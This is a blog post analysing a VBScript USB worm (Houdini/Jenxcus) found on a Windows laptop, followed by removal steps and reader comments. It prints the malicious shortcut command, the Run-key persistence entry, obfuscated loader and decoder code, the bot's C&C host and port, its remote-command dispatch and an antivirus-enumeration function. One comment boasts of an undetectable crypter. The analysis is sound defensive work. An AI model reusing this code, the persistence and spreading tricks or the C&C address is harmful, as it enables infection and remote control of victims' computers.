Last week I was asked to check a Windows 7 x64 laptop due an extremely poor performances, so as first step I run a complete scan with AntiMalwareBytes free and Avira Antivirus. This two great free software made a great works cleaning more than 170 infected objects!! After the reboot another scan has been started just to be sure that everything was fine and the results confirmed the clean status.
Two days ago the same laptop starts to create strange links on every USB stick plugged so I start a manual analysis of the behavior (unfortunately my Cuckoo Sandbox is building up and not ready yet): using a clean just formatted pen-drive I copied a test folder on the USB and after few seconds that folder was hidden and replaced by a link with the same folder name addressing the following command:
C:\Windows\system32\cmd.exe /c start mmpifmxnth..vbs&start explorer <folder_name>&exit
Ok…I have a clue to start the investigation and I searched for mmpifmxnth..vbs using Windows Search (it’s not a forensic tool but it’s quick enough for the first search 🙂 ) without any results. I found the right path looking the Run registry key:
HKCU/Software/Microsoft/Windows/Run = wscript.exe //B "C:Users\AppDataRoamingmmpifmxnth..vbs"
The file was hidden and flagged as system-file so I need to enable “Show Hidden Files” and “Show system files” under Windows Explorer preferences in order to get it.
Finally I moved the vbs script to my LinuxBox: Avira Antivirus has not detected the malicious content even when accessed via notepad !!!
When opened using Gedit I found a big pieces of obfuscated code like this:
'< -Safa7_22 Crypter- >
Safa7_22 = deCrypt("UkZwRFRFOVdSVklnUFNBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16Sjh
HA4TVRBd2ZHUjZmREV3TFZrVlNLRWtwS1EwS1RrVJhUTB4UFZrVlNLRWtwS1EHA4TmpCOFpIcDhPVEY
NBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16SjrVJhUTB4UFZrVlN4TmpCOFpIcD4UFZrVRFRFUF7
---CUT---
JhUTB4UFZrVlNLRWtwS1EwS1RrVllWQTBLUlZoRlExVlVSU0FvWkhvcA==")
Safa7_22 = deCrypt(Safa7_22)
The first line refer to -Safa7_22_Crypter- encoder but the text was double encoded using Base64 and I used base64decoder.org to make a two-step-decoding (using UTF-8 charset) to have the original script. The double encoder was easily detected looking the last two chars of encoded text and the function deCrypt(data) / decodeDz(data).
---CUT--- JhUTB4UFZrVlNLRWtwS1EwS1RrVllWQTBLUlZoRlExVlVSU0FvWkhvcA==") Safa7_22 = deCrypt(Safa7_22) EXECUTE (Safa7_22) function deCrypt(data) deCrypt=decodeDz(data) end function
The script seems slightly different by the original one you can find as result of a Google search and the MD5 hash on VirusTotal has less detection score. Anyway the double decoding process give me a more “clear text” script, but it is already encoded !!!
---CUT--- |dz|110|dz|99|dz|116|dz|105|dz|111|dz|110|dz|" DZCLOVER = SPLIT(DZCLOVER,"|dz|") FOR I = 0 TO UBOUND(DZCLOVER) -1 dz = dz & CHR(DZCLOVER(I)) NEXT EXECUTE (dz)
The last line decode the payload and execute it on target machine, so I patched the script removing the EXECUTE and adding the WRITE TO FILE function to save a file with the plain-text decoded script.
DZCLOVER = SPLIT(DZCLOVER,"|dz|")
FOR I = 0 TO UBOUND(DZCLOVER) -1
dz = dz & CHR(DZCLOVER(I))
NEXT
Set fso = CreateObject ("Scripting.FileSystemObject")
Set stdout = fso.CreatetextFile("C:TEMPmalware.txt")
stdout.WriteLine dz
Finally I run the patched version inside a Windows 7 x64 Virtual Machine and get the original malware in C:TEMPmalware.txt (Locally installed AntiVirus software detected the text file as malicious, so I have to stop it before execute the script) using the following command:
wscript.exe /B mmpifmxnth_patched.vbs
The code analysis was really interesting and I found many features provided by the malware…the first line is a comment with the author skype id !!!
Under the config section there is a callback domain and the port of C&C and the installation folder. This domain is one of the most famous free dynamic ip service and actually is resolved as 37.200.254.47 (Oman Muscat Omani Qatari Telecommunications Company Saoc).
'<[ recoder : houdini (c) skype : houdini-fx ]> '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= host = "dev-point1.no-ip.info" port = 2121 installdir = "%appdata%" lnkfile = true lnkfolder = true ---CUT---
At startup malware check if the host is already infected and, if not, try to install itself and make an HTTP-POST request with command “is-ready” to notify the C&C and waiting for a response (command to be executed). The list of the command available is the following:
case "excecute" param = cmd (1) execute param case "update" param = cmd (1) oneonce.close set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false) oneonce.write param oneonce.close shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) wscript.quit case "uninstall" uninstall case "send" download cmd (1),cmd (2) case "site-send" sitedownloader cmd (1),cmd (2) case "recv" param = cmd (1) upload (param) case "enum-driver" post "is-enum-driver",enumdriver case "enum-faf" param = cmd (1) post "is-enum-faf",enumfaf (param) case "enum-process" post "is-enum-process",enumprocess case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param) case "delete" param = cmd (1) deletefaf (param) case "exit-process" param = cmd (1) exitprocess (param) case "sleep" param = cmd (1) sleep = eval (param) end select
Looking deeply into the source code, I found every command action:
- execute : run a specific command on victim host
- update : change malware configuration. For example could be used to change the callback domain 🙂
- uninstall : remove the malware from the system and clean every malicious .lnk file
- send : copy a file from the attacker to the victim
- site-send : copy a file hosted on a website to the victim
- recv : download a file from victim host
- enum-driver : list the victim host drives
- enum-faf : list all files and folders on victim host
- enum-process : list the victim running processes
- cmd-shell : open a command shell
- delete : delete file or folder on victim host
- exit-process : kill specific process on victim host
- sleep : wait 5 second (referred to sleep=5000 in private vars section)
This malware provide to the attacker many information about victim host: operating system, architecture, service pack level, logical drives, running processes, etc…
There are also a specific function (security) used to enumerate the Security Center and Antivirus Status.
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\.rootcimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\localhostroot" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
Using this function the attacker can enumerate security features installed on victim host and act as dropper: using send function the attacker can upload malicious code to avoid the specific AntiVirus detection and start evasion techniques.
A more detailed analysis about malware GET and POST command is available on http://research.zscaler.com/2014/01/analysis-of-vbscript-bot.html (thanx to Stefano @SerKill1984 for the link)
VirusTotal has 26/47 as detection rate for this malware and you can read the complete report here. The malware name for the most famous AntiVirus products is:
- AVG: Exploit_c.YUV
- AVAST: VBS:Decode-BL [Trj]
- NOD32: VBS/Kryptik.J
- Kespersky: Worm.VBS.Dinihou.c
- McAfee: VBS/Autorun.worm.aapf
- Microsoft: Worm:VBS/Jenxcus.K
- Sophos: VBS/Safa-A
- Symantec: VBS.Dunihi
- TrendMicro: VBS_DUNIHI.FF
How to remove mmpifmxnth malware ?
- Open the Task Manger and check if wscript.exe is running. If YES terminate the process.
- Chaneg your Windows Explorer settings to show hidden and systems files.
- Run the regedit and search for HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentversionrun
- Look for mmpifmxnth value and copy the installation path in your text editor (notepad). Then delete the registry key.
- In regedit search for HKEY_CURRENT_USERsoftwaremicrosoftwindowscurrentversionrun and delete mmpifmxnth registry key.
- Open your Windows Explorer and browse the installation path you copied in step 4
- Delete the mmpifmxnth..vbs (yes….there are two dots!)
- Delete every link addressing wscript.exe you will find in every usb sticks or format the pendrives 🙂
I hope the article will be useful. If you have any questions or suggestions use the comment form below !
I actually tried to decipher this virus myself after seeing what the links execute.
I got as far as the DZCLOVER stuff before I tried searching Google for “DZCLOVER” and found this site.
Awesome work! 🙂
You might wanna use the uninstall command to remove the malware from the system. 😉
hhhhhh nice job , now you cant decipher any file i use a new methode to crypt my virus
and no one can delete or kill it